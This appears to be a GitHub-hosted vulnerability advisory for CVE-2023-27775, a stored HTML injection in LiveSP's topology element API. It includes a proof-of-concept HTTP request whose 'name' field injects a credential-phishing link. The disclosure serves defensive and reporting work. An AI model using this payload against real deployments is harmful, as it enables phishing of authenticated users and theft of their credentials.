Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2023-27775 - Stored HTML Injection

Description

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary HTML code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

POC

HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences. Generally, it can allow the attacker to modify the page content seen by the victims. The attack takes effect when the victim’s browser displays the corrupted page.

This vulnerability occurs when user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) legitimate parts from malicious parts of the page, and consequently will parse and execute the whole page in the victim’s context.

Affected Endpoint

  • URL: https://[ip:port]/va/service/bach/topology/element
  • HTTP Post Parameter: name

Technical Details

In this specific instance, using the API available under /va/service/bach/topology/element, it is possible to inject arbitrary HTML code within the name POST parameter, as shown in the following HTTP Request/Response pair.

HTTP Request:

POST /va/service/bach/topology/element HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REDACTED]
Content-Type: application/json
Content-Length: 178
Origin: [REDACTED]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\"><a href=\"http://foo.com\">Insert your credentials here</a>","extraLabel":""},"type":"cluster","keyType":"cluster:area","children":{"cluster:site":[]}}

HTTP Response:

HTTP/1.1 201 Created
Server: [REDACTED]
Date: Wed, 04 Jan 2023 14:52:08 GMTContent-Type: application/json
Content-Length: 785
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: [...]
Access-Control-Allow-Origin: *
Referrer-Policy: strict-origin

[...]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the https://[hostname:port]/va/cluster web page, the exploit runs from the victim’s browser.

html_injection

Reference